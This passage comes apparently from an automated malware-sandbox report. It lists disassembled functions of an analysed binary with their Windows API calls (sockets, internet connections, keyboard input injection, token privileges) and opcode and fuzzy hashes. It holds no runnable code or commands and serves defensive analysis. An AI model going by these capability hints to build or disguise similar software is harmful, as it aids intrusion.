                            • Opcode Fuzzy Hash: 320aa51dbbc5344dfaf843bacf57c176666718d0dc4b19467a3c0bb54c6b40d7
                            • Instruction Fuzzy Hash: 82416174A00209ABDF11EF68D895BFEBBB9EF44724F040069F905A7291DB749A44CBB1
                            Function 00DB69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB69D1
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB69E1
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DB6A45
                            • WSAGetLastError.WSOCK32(00000000), ref: 00DB6A51
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorLast$__itow__swprintfsocket
                            • String ID:
                            • API String ID: 2214342067-0
                            • Opcode ID: 1d1f97c66502d5e1960c18d585062d5e94fa98dccd6d1d554ed5ea9c6f2ed02a
                            • Instruction ID: 61e21672b9f43b39c83d76aa144b5b2030a2185cbdb06f47254cf4ec5a0d1c88
                            • Opcode Fuzzy Hash: 1d1f97c66502d5e1960c18d585062d5e94fa98dccd6d1d554ed5ea9c6f2ed02a
                            • Instruction Fuzzy Hash: 6C418D75640201AFEB60AF28CC96F6E77A5DF04B54F048428FA59AB3D2DA749D018BB1
                            Function 00DB641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                            Download Yara Rule
                            APIs
                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00DCF910), ref: 00DB64A7
                            • _strlen.LIBCMT ref: 00DB64D9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID:
                            • API String ID: 4218353326-0
                            • Opcode ID: ab36bf761651193cee9df465033a35935dfeabdbf5d7d0c896e7908f61795bac
                            • Instruction ID: 7bfe9b7f486885542300d4574bc18aba028edf4c70b470ea6778a5a26477e757
                            • Opcode Fuzzy Hash: ab36bf761651193cee9df465033a35935dfeabdbf5d7d0c896e7908f61795bac
                            • Instruction Fuzzy Hash: E0418071600104ABCB24EBA9EC96FEEB7A9EF44310F148155F81A97292EB34ED14CB70
                            Function 00DAB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DAB89E
                            • GetLastError.KERNEL32(?,00000000), ref: 00DAB8C4
                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DAB8E9
                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DAB915
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHardLink$DeleteErrorFileLast
                            • String ID:
                            • API String ID: 3321077145-0
                            • Opcode ID: a67a70727fc1d75cc8c3c5c73988295480a5353ad71b92ffba998184794d6769
                            • Instruction ID: b1f419f7cc6e8e5e40701176f6fc4c69b0ecf2564e27baf794615b551468e0b0
                            • Opcode Fuzzy Hash: a67a70727fc1d75cc8c3c5c73988295480a5353ad71b92ffba998184794d6769
                            • Instruction Fuzzy Hash: 8D410D35600611DFCB11DF19C495A5ABBE1EF8A320F198099ED4A9B362CB35FD02CBB1
                            Function 00DC8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                            Download Yara Rule
                            APIs
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00DC88DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InvalidateRect
                            • String ID:
                            • API String ID: 634782764-0
                            • Opcode ID: f59f19ab5f37a6d26a971816adec98a026360688dc1148d47377fb947bee781e
                            • Instruction ID: 8eea344ea5209f9e5cacbcb8f0ec3a05aacc15c5f0f5d7b847773dd41b29d71d
                            • Opcode Fuzzy Hash: f59f19ab5f37a6d26a971816adec98a026360688dc1148d47377fb947bee781e
                            • Instruction Fuzzy Hash: 8731C33464020BAFEB249B58DC45FB977A5EB09310F98411AFA51E72A1CF71D980BF72
                            Function 00DCAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                            Download Yara Rule
                            APIs
                            • ClientToScreen.USER32(?,?), ref: 00DCAB60
                            • GetWindowRect.USER32(?,?), ref: 00DCABD6
                            • PtInRect.USER32(?,?,00DCC014), ref: 00DCABE6
                            • MessageBeep.USER32(00000000,?,?,?,?,00DCC014,?,?,?), ref: 00DCAC57
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Rect$BeepClientMessageScreenWindow
                            • String ID:
                            • API String ID: 1352109105-0
                            • Opcode ID: ab1b7e9cda4a84cd1927008c9ab7cd53e7bc2f5d6a2b419099f58f7a556034ee
                            • Instruction ID: 3a8890ef3e9f859a41b60ac55b3dd3411931d4f11f23bdd1d9c10ab6368ad6ec
                            • Opcode Fuzzy Hash: ab1b7e9cda4a84cd1927008c9ab7cd53e7bc2f5d6a2b419099f58f7a556034ee
                            • Instruction Fuzzy Hash: B8416A3960021A9FCB16DF5CC984FA97BF6FB49304F1881A9E8549B260D731A841CFB2
                            Function 00DA0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0B27
                            • SetKeyboardState.USER32(00000080), ref: 00DA0B43
                            • PostMessageW.USER32 ref: 00DA0BA9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00DA0BFB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
                            • Instruction ID: ac336b2f497bc5d46c1c84809df71f396c39b76ef15fc5976c6107c87f5f13f0
                            • Opcode Fuzzy Hash: 88ef64eca2485b672c081e42d655a371c5f51684b49e2b89e63768f759952298
                            • Instruction Fuzzy Hash: 3931F870A40318AEFF308F25CD05BFABFA6AB47314F0C425AF595921D1C37589459775
                            Function 00DA0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00DA0C66
                            • SetKeyboardState.USER32(00000080), ref: 00DA0C82
                            • PostMessageW.USER32 ref: 00DA0CE1
                            • SendInput.USER32(00000001,?,0000001C), ref: 00DA0D33
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: KeyboardState$InputMessagePostSend
                            • String ID:
                            • API String ID: 432972143-0
                            • Opcode ID: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
                            • Instruction ID: 7f19ec162d76644329727e400e88a377e1e881f897abf384b19b00aeca108c74
                            • Opcode Fuzzy Hash: ffd07191c19b771b0d9ec19fd8400e0f493e59bec30e11ca3ae224f6003b6363
                            • Instruction Fuzzy Hash: DC3126319403186FFF308B65C805BFEBFAAAB47320F08831AE585925D1C339999587B2
                            Function 00D761C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00D761FB
                            • __isleadbyte_l.LIBCMT ref: 00D76229
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D76257
                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00D7628D
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                            • String ID:
                            • API String ID: 3058430110-0
                            • Opcode ID: c1496b1cbff9f46e483779fd5094b8208ee9bed6f22c14743a8ff2b87a7f666b
                            • Instruction ID: c3fd871a66ee98a1c81d57817df94109ebc9fdab045196d92902b93c64bd53b3
                            • Opcode Fuzzy Hash: c1496b1cbff9f46e483779fd5094b8208ee9bed6f22c14743a8ff2b87a7f666b
                            • Instruction Fuzzy Hash: 9231CE30600B46AFDB219F65CC48BAA7BA9FF41310F198128E868971A2F731D950DBB0
                            Function 00DC4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 00DC4F02
                              • Part of subcall function 00DA3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00DA365B
                              • Part of subcall function 00DA3641: GetCurrentThreadId.KERNEL32(00000000,?,00DA5005), ref: 00DA3662
                              • Part of subcall function 00DA3641: AttachThreadInput.USER32(00000000,?,00DA5005), ref: 00DA3669
                            • GetCaretPos.USER32(?), ref: 00DC4F13
                            • ClientToScreen.USER32(00000000,?), ref: 00DC4F4E
                            • GetForegroundWindow.USER32 ref: 00DC4F54
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                            • String ID:
                            • API String ID: 2759813231-0
                            • Opcode ID: 049ed03d3161b1d3a0eb949b23269d021456c21d16e88eb094436a87549069ab
                            • Instruction ID: 2e11ca46317548ad4794da691e1133c62a71892d87b497132df93547373e4401
                            • Opcode Fuzzy Hash: 049ed03d3161b1d3a0eb949b23269d021456c21d16e88eb094436a87549069ab
                            • Instruction Fuzzy Hash: 75310C71D00209AFDB00EFAAC995EEFB7F9EF99300B10406AE455E7241DA719E058BB0
                            Function 00DCC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623
                            • GetCursorPos.USER32(?), ref: 00DCC4D2
                            • TrackPopupMenuEx.USER32 ref: 00DCC4E7
                            • GetCursorPos.USER32(?), ref: 00DCC534
                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D7B9AB,?,?,?), ref: 00DCC56E
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                            • String ID:
                            • API String ID: 2864067406-0
                            • Opcode ID: b90979a1746d65b67320865a706a60438f73cffd7ff9dbc24d2a3714e024243c
                            • Instruction ID: e604d6a4909e904accbfa1d6e49824d0864da92f0012fe2f2e92a9dd820a6d22
                            • Opcode Fuzzy Hash: b90979a1746d65b67320865a706a60438f73cffd7ff9dbc24d2a3714e024243c
                            • Instruction Fuzzy Hash: 0F319135620059AFCB158F58C858EFA7BB6EB09310F484169FA099B2A1C731ED50DFB4
                            Function 00D98656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D9810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D98121
                              • Part of subcall function 00D9810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D9812B
                              • Part of subcall function 00D9810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9813A
                              • Part of subcall function 00D9810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98141
                              • Part of subcall function 00D9810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D98157
                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D986A3
                            • _memcmp.LIBCMT ref: 00D986C6
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D986FC
                            • HeapFree.KERNEL32(00000000), ref: 00D98703
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                            • String ID:
                            • API String ID: 1592001646-0
                            • Opcode ID: 8f5514d0eafc5bcdcdb8d7f1609b39bdc396d489a6d33244b99aa8c5474a2efd
                            • Instruction ID: 7e55a424237088c9a9c27a2f5d3a1192092c01d607929348e75b258a14c0f6a1
                            • Opcode Fuzzy Hash: 8f5514d0eafc5bcdcdb8d7f1609b39bdc396d489a6d33244b99aa8c5474a2efd
                            • Instruction Fuzzy Hash: F2218E71E40209EFDF10DFA8C949BEEB7B9EF45704F194059E444AB240DB31AE05DB60
                            Function 00D6098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                            Download Yara Rule
                            APIs
                            • __setmode.LIBCMT ref: 00D609AE
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            • _fprintf.LIBCMT ref: 00D609E5
                            • OutputDebugStringW.KERNEL32(?), ref: 00D95DBB
                              • Part of subcall function 00D64AAA: _flsall.LIBCMT ref: 00D64AC3
                            • __setmode.LIBCMT ref: 00D60A1A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                            • String ID:
                            • API String ID: 521402451-0
                            • Opcode ID: 00ccc611812461765606c60f1bf61ec3b33ff4d13bf6ff9ee2e67d4f4ba58fd8
                            • Instruction ID: 9fd1f47f15228add9bd84e1c270de0f643b4b54c778155504cd31ed0164baeeb
                            • Opcode Fuzzy Hash: 00ccc611812461765606c60f1bf61ec3b33ff4d13bf6ff9ee2e67d4f4ba58fd8
                            • Instruction Fuzzy Hash: DB11E4329042047FDB04B7F4AC479FFBBA9DF46320F240156F205A7293EE21584697B5
                            Function 00DB1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DB17A3
                              • Part of subcall function 00DB182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB184C
                              • Part of subcall function 00DB182D: InternetCloseHandle.WININET(00000000), ref: 00DB18E9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Internet$CloseConnectHandleOpen
                            • String ID:
                            • API String ID: 1463438336-0
                            • Opcode ID: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
                            • Instruction ID: 051e93a48eb5bed4837335f6449d4beab8f8244878e24c980841e6f6ccc8f658
                            • Opcode Fuzzy Hash: 41c52f70fad2a34e10ad1eff8035cb98702dedfa7e093666906b1d71464640e2
                            • Instruction Fuzzy Hash: C821953A200606FFDB125F609C11FFAB7AAFF48711F54402AF956D6650DB71D81197B0
                            Function 00DA3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNEL32(?,00DCFAC0), ref: 00DA3A64
                            • GetLastError.KERNEL32 ref: 00DA3A73
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DA3A82
                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DCFAC0), ref: 00DA3ADF
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateDirectory$AttributesErrorFileLast
                            • String ID:
                            • API String ID: 2267087916-0
                            • Opcode ID: d0d2884154f56982c90da320f394e5391b6f1564753a9cf45d597d127ad6f387
                            • Instruction ID: 2d98397f7589b25251fad1132612ad25eb84ca697f0047046b68d037855129ff
                            • Opcode Fuzzy Hash: d0d2884154f56982c90da320f394e5391b6f1564753a9cf45d597d127ad6f387
                            • Instruction Fuzzy Hash: FC21A3745083129F8700DF28C8818AABBE6EF56364F144A2DF4D9C72A2D731DE49CB72
                            Function 00D750E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 00D75101
                              • Part of subcall function 00D6571C: __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6571C: __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6571C: RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: b1202aee6aab6b4f6852fc9b86e375710b727c96e5e12a957aa6134772299f67
                            • Instruction ID: 7f6862e1aa25d1212b0478f27e2e59617508d913c2ceac8a7deba9477661aa33
                            • Opcode Fuzzy Hash: b1202aee6aab6b4f6852fc9b86e375710b727c96e5e12a957aa6134772299f67
                            • Instruction Fuzzy Hash: 2011E372500B16AFCB313F74BC06B6D3B98DB00362B548629FD4D96254EEB0C94097B1
                            Function 00D444A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 00D444CF
                              • Part of subcall function 00D4407C: _memset.LIBCMT ref: 00D440FC
                              • Part of subcall function 00D4407C: _wcscpy.LIBCMT ref: 00D44150
                              • Part of subcall function 00D4407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D44160
                            • KillTimer.USER32 ref: 00D44524
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D44533
                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D7D4B9
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
